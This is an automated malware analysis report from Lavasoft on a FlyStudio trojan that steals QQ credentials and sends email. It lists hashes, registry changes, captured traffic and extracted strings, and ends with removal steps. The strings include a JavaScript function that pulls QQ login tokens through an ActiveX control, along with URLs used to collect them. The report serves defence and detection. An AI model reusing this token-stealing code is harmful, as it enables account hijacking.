Trojan.Win32.FlyStudio_c9f101613b
Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: c9f101613b2b8c83e258f2cd9a13524e
SHA1: eb119de67c787b1608b5be7c1ebd697014918298
SHA256: c10839711810a1c3b722dcf54dc600e80572965e0ac51284fc22cf70e6ac130d
SSDeep: 24576:xgWheFi8AXOjJzcQ6vh8PhIL569TPaWEUbdSs uhwTS7:xgWhMAso5vh8PaQhEbTS
Size: 1466368 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-04-09 09:14:47
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:3852
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\qlogin[1].htm (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJFV5BC8.txt (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\2409490842014111013118567[1].htm (41101 bytes)
Registry activity
The process %original file name%.exe:3852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "10 58 B5 F9 BB 9E D2 01"
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1916x902x32(BGR 0)" = "31,31,31,31"
[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"
[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"
"WpadNetworkName" = "Network 2"
[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "10 58 B5 F9 BB 9E D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: ??
Product Name: ??QQ????????
Product Version: 1.0.0.0
Legal Copyright: ?? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: QQ????????
Comments: ??QQ??????!
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 646311 | 647168 | 4.51749 | db562b266335aa493c9c76d7d1615a42 |
| CODE | 651264 | 338768 | 339968 | 4.57617 | fb7dc939be45a9fe85f1d22181b2cd06 |
| .rdata | 991232 | 211654 | 212992 | 4.46426 | 69268c205267c12aa32bc861068a06ba |
| .data | 1204224 | 324586 | 73728 | 3.39297 | 0d4ec8bc7d030d9715ca5e2a5d6882f8 |
| DATA | 1531904 | 69260 | 69632 | 5.14483 | c25123d93051dc239b933062d22dc4e9 |
| BSS | 1601536 | 25785 | 28672 | 0 | cf845a781c107ec1346e849c9dd1b7e8 |
| .rsrc | 1630208 | 87616 | 90112 | 3.72279 | d919fcb65d0414798cb93a67989ff714 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://xui.ptlogin2.tencent-cloud.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252Fwww.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0 | |
| hxxp://p21.tcdn.qq.com/ptlogin/ver/10202/js/xui.js?v=10007 | |
| hxxp://p21.tcdn.qq.com/ptlogin/v4/style/0/images/icons.gif | |
| hxxp://blog.163.com/blog/static/2409490842014111013118567/ | |
| hxxp://blog.163.com/blog/static/2409490842015210103242809/ | |
| hxxp://skins12138.blog.163.com/blog/static/2409490842015210103242809/ | |
| hxxp://imgcache.qq.com/ptlogin/ver/10202/js/xui.js?v=10007 | |
| hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif | |
| hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252Fwww.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0 | |
| hxxp://skins12138.blog.163.com/blog/static/2409490842014111013118567/ | |
| dns.msftncsi.com | |
| teredo.ipv6.microsoft.com | |
| log.wtlogin.qq.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: X2S_Platform
Connection: keep-alive
Date: Fri, 17 Mar 2017 01:15:39 GMT
Cache-Control: max-age=2592000
Expires: Sun, 16 Apr 2017 01:15:39 GMT
Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT
Content-Type: image/gif
Content-Length: 7902
X-NWS-LOG-UUID: 7ec810b2-a5ec-41b3-a520-f3116d577d9b
Keep-Alive: timeout=60
Vary: Origin
X-Cache-Lookup: Hit From DisktankGIF89as.r.................................................^....A......
.............! ............B.....}....................1)-t............
........j...........................................................c.
.>..p[E............z...........q.....u.....j.......................
..................Z.................b.................................
.................^................................!.......,....s.r....
.'..........X......'...............................X..................
...........X......................................)....Fz%.K.1.......*
\......#J.H.....3".........I.....'K.S..e..0..\).&..-m...RgO.3w..94(..F
..T.t...P.J.J.*..X...*....%Fr.K....h..].....p....KWn..x....p...'..\...
.... ^......#K.L.....3C..w..................@...c.....k..g....v.......
|....q ..{.....K...te...k..0...'....F......_.........O..............z.
...B.Y_:.....6.........ZP...b(a..n.!......!.8..".h..(..b.0....2.x..8..
..;>...@.._.D.i...&i`..q.1..PF)..P>Y..Db...\....^....Y.Y&.[..&._
....o....r....l.y..|......J....j(.5$...p\..gIzV..p.....f....v.....*...
.j.............".....j..<........... ....k...&....6...MD m...X...8.
...L.....;m.........n....n........ko...................0..$....7....G,
....`...< ........C ...$.l.....2.*[.2./.... ..2.7..3.;.,..<....=
.-t.H..t.L....PG-..TS...Xg...(t.5...$.....I......_....p{..._....(..w.|
....}..w...>.............G....W....d....w.y......].`..80 6.........
....n............../....o|..$..........Q..U...GF0....w...../.....o....
.........3 ....a..X.!A!K.....0...@......L......:......'H..Z.......<<< skipped >>>
GET /blog/static/2409490842014111013118567/ HTTP/1.1
Accept: */*
Referer: hXXp://skins12138.blog.163.com/blog/static/2409490842014111013118567/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: skins12138.blog.163.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Mar 2017 01:15:44 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hljLOMAig1kJBs5JAg==; expires=Sat, 17-Mar-18 01:15:44 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"b49.. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.. <html xmlns
="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">.. <hea
d>.. <meta http-equiv="X-UA-Compatible" content="IE=7" />.
. <meta http-equiv="content-type" content="text/html;charset=gbk
"/>.. <meta http-equiv="content-style-type" content="text/css
"/>.. <meta http-equiv="content-script-type" content="text/ja
vascript"/>.. <meta name="version" content="neblog-1.0"/>.
. <script type="text/javascript">.. .. .. docu
ment.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=loca
tion.hash); .. document.domain = location.hostname.replace(/^.*\.
([\w] \.[\w] )$/,'$1');.. window.focus();.. window.getMusicT
imeStamp=function(){return '5dc9af78bbc20fbd0150e0675ff893a8';};..
.. //BLOG-647:....OS.............................. (function
(){.. window.setTimeout(function(){.. var _loginUserIc
on = document.getElementById('loginUserIcon');.. var _rsavata
rimg = document.getElementById('rsavatarimg');.. if(!!_loginU
serIcon){.. var _loaded1 = false;.. var _img1 =
new Image();.. _img1.onload = function(){..
_loaded1 = true;.. _img1.onload = null;.. };
.. _img1.src = _loginUserIcon.src;.. window.setT
imeout(function(){.. if(!_loaded1){..<<< skipped >>>
GET /blog/static/2409490842015210103242809/ HTTP/1.1
Accept: */*
Referer: hXXp://skins12138.blog.163.com/blog/static/2409490842015210103242809/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: skins12138.blog.163.com
Cache-Control: no-cache
Cookie: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; usertrack=c 5 hljLOMAig1kJBs5JAg==
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 17 Mar 2017 01:15:46 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding583..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<ht
ml xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>.. <met
a http-equiv="Content-type" content="text/html; charset=GBK">..
<meta name="robots" content="noindex"> .. <link href="http
://b.bst.126.net/style/common/error/404.css" type="text/css" rel="styl
esheet"/>..<title>........</title>..</head> ..<
;body>..<noscript><div>........................</div
></noscript>..<div class="g-doc">...<div class="g-hd
">....<div class="er-head bds0 bdwb bdc0">.....<h1 class="
icn0 icn0-0 bgc0"><a href="hXXp://blog.163.com/" class="notxt"&g
t;..........blog.163.com</a></h1>.....<div class="er-qu
ick fc1">......<a href="hXXp://blog.163.com/" class="fc1 ul">
........</a>...... | ......<a rel="nofollow" href="
hXXp://help.163.com/special/007525FT/blog.html" class="fc1 ul">....
</a>.....</div>....</div>...</div>...<div c
lass="g-bd">....<div class="er-cnt">.....<div class="er-fa
ce fs3 fc2">o. 0</div>.....<div class="er-detail">.....
.<h2 class="fs2 fc2">....</h2>......<div class="er-reas
on bgc1">.......<p class="fs1">..........................,...
.........................</p>.......<span class="er-arrow icn
0 icn0-1"></span>......</div>.....</div>....&<<< skipped >>>
GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 17 Mar 2017 01:15:37 GMT
Content-Type: text/html
Content-Length: 5476
Connection: keep-alive
Server: QZHTTP-2.38.41
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=-542769849; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmln
s="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="C
ontent-Type" content="text/html; charset=utf-8"> <style type="t
ext/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Ari
al,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-h
eight:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0
0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_gray,.bt
n_select{border:0;color:#2473A2;width:103px;height:28px;padding-left:2
px;cursor:pointer;font-weight:700;font-size:14px}.btn_select{backgroun
d:url(//imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) -102px -1
30px no-repeat}.btn_gray{background:url(//imgcache.qq.com/ptlogin/v4/s
tyle/0/images/icons.gif) -102px -225px no-repeat}#login #list_uin img{
padding:7px;background:url(//imgcache.qq.com/ptlogin/v4/style/0/images
/icons.gif) 0 -329px no-repeat}#list_uin li{list-style:none;padding:0
0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-heigh
t:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;widt
h:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#logi
n p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.
x_lowLogin{padding:10px 0 0 28px;display:none}</style> <scri
pt>var g_begTime=new Date();..(function(){...window.onerror = funct
ion(msg,url,line){....var reportUrl = location.protocol == "https:<<< skipped >>>
GET /ptlogin/ver/10202/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: X2S_Platform
Connection: keep-alive
Date: Fri, 17 Mar 2017 01:15:39 GMT
Cache-Control: max-age=604800
Expires: Fri, 24 Mar 2017 01:15:39 GMT
Last-Modified: Mon, 13 Mar 2017 08:35:12 GMT
Content-Type: application/x-javascript
Content-Length: 3460
Content-Encoding: gzip
X-NWS-LOG-UUID: 1cf7e165-ec73-49eb-b3dd-42d45240b1e9
Keep-Alive: timeout=60
Vary: Origin
X-Cache-Lookup: Hit From Disktank Gz...........Z.w.... X....,..i..q\'..........#.....w........O i.#''.F..4
3..4.2.m.......K.D...E`'....0q.2..n}....2..E.g..oE$G.....=.Ca..w.j..M.
..F5F@....u...O\...z.@...f...]Q.m6.....frq}.K.<}w~.K....H5.......%L
Wj...X.\..=5.>....29$....S......>T.*v.....vG...`.{..t...v.....&l
t;.".N.:.(wb.G....:....:..gO............1...r.......9H..cT.._.....Z.n.
p.....&...8t.0P......C....LN........._..;G.j.@s...15q.K...9.....././..
/.|pH#2....$.n..p{e..K...{,H.A#G9ql..u..ms....Z..A$N...r......y...O...
Uks.9D..(..X.l|...u.%1..@k.be....4i..j..fs.2_..l..W]..X%....E.*;W.b...
...3.|.D7.Ki>.hE....[-..."F.....?QA.sP....bn&R6.L...=^.Br...-.C....
....&~../...q.4..m...b.............W...... ..G....'.].b..=.QLb.<..A
p..A....".Iw..<.}8.....j:3Mk.AH...Pa... ....................a..?b./
....c...[.c./...r... ..C.T....V,..D4..9...&h....#|......WB.q......Y.b.
9n...........j='..w.(v.h.E...j..G.........F]....y...\.j.Q.y@1.W.....0-
.mj.......Z..Z.o.....8?..\>../t..d$g&.J........#.....9.2....Qq.,t!.
e.E..38d:..I....'{Got<>..QU..#....&..8.sF...C....".P.&h.!u.u...&
gt;@.......D...{. .....E4...|4.~........K....I.4....5...c...J.Qj.P3hFM
i..K.....w.F......*v...V..`T.^.>......2m.h.......p`(i..&2.-5..~..m.
.C..g...\...2n....t1.S.@...d.1...6..crw%..z.[.V.......OR2`...i..J.3ea.
1..................s..R.^.Q.p.d.R.s..k...c...........e...6F.!.'0.>.
b.|..x.4.|.4.^%`..Gf.=3.6...2O._.. 3n....:d...FG..Fa.Q...f....A.....^^
.N.L..~....bJ.J..d4.Gt@3..4.Z..e.j. ...Z<..g...$..-.../J. .......3.
]......e..I$7.q.S*t..t...../..KK.....x ;..C.e 7.....-P/.....p./$&<<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
MaxKeySize
Invalid key size
%UUUU1E
%UUUU3
5 passes)
1.2.3
DB00735E-CFFB-47E6-B060-BB0D74008B7A
94-401@163.com
Hw2.Hw
wininet.dll
ole32.dll
user32.dll
gdi32.dll
atl.dll
shlwapi.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
ShellExecuteA
&scope=0&view=1&daylist=undefined&uinlist=undefined&gid=&flag=1&filter=all&applist=all&refresh=0&firstGetGroup=0&icServerTime=1364288778&mixnocache=0&scene=0&begintime=0&count=15&dayspac=0&sidomain=cnc.qzonestyle.gtimg.cn&g_tk=
hXXp://ic2.s6.qzone.qq.com/cgi-bin/feeds/feeds2_html_more?uin=
key:'(.*?)',
showEbtn:'',
nickname:'(.*?)',
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXps://
hXXp://
hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=
/mood/
.1&curkey=http://user.qzone.qq.com/
&unikey=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
0@hXXp://taotao.qq.com/cgi-bin/emotion_cgi_addcomment_ugc?g_tk=
&pfid=2&qz_ver=8&appcanvas=0&qz_style=1&params=&entertime=1382746831390&canvastype=&uin=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/mood_v6/html/index.html?mood#uin=
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
782843836
2904593
hXXp://ui.ptlogin2.qq.com/cgi-bin/login?appid=549000912&s_url=hXXp://qun.qzone.qq.com/group&style=12.com
ui.ptlogin2.qq.com
skey=@
Wp.Iw
A.zkt@
5p|%U
ù'p
hXXp://skins12138.blog.163.com/blog/static/2409490842014111013118567/
hXXp://skins12138.blog.163.com/blog/static/2409490842015210103242809/
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
WEBT
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qzone_sig=1&ptopt=1
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
skey=
&Btn=提交
hXXp://0cmz.xyz/index.php
VBScript.RegExp
@wininet.dll
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
RASAPI32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
GetProcessHeap
WinExec
GetCPInfo
GetKeyState
GetKeyboardType
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
oledlg.dll
WSOCK32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
(*.htm;*.html)|*.htm;*.html
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
VVV.dywt.com.cn
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hljLOMAig1kJBs5JAg==; expires=Sat, 17-Mar-18 01:15:44 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
kins12138.blog.163.com/blog/static/2409490842014111013118567/
c:\%original file name%.exe
*.yUW
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
#include "l.chs\afxres.rc" // Standard components
1, 0, 6, 6
- Skin.dll
(*.*)
1.0.0.0
%original file name%.exe_3852_rwx_10000000_0003F000:
`.rsrc
L$(h%f
SSh0j
Gw2.Hw
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\qlogin[1].htm (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJFV5BC8.txt (89 bytes)
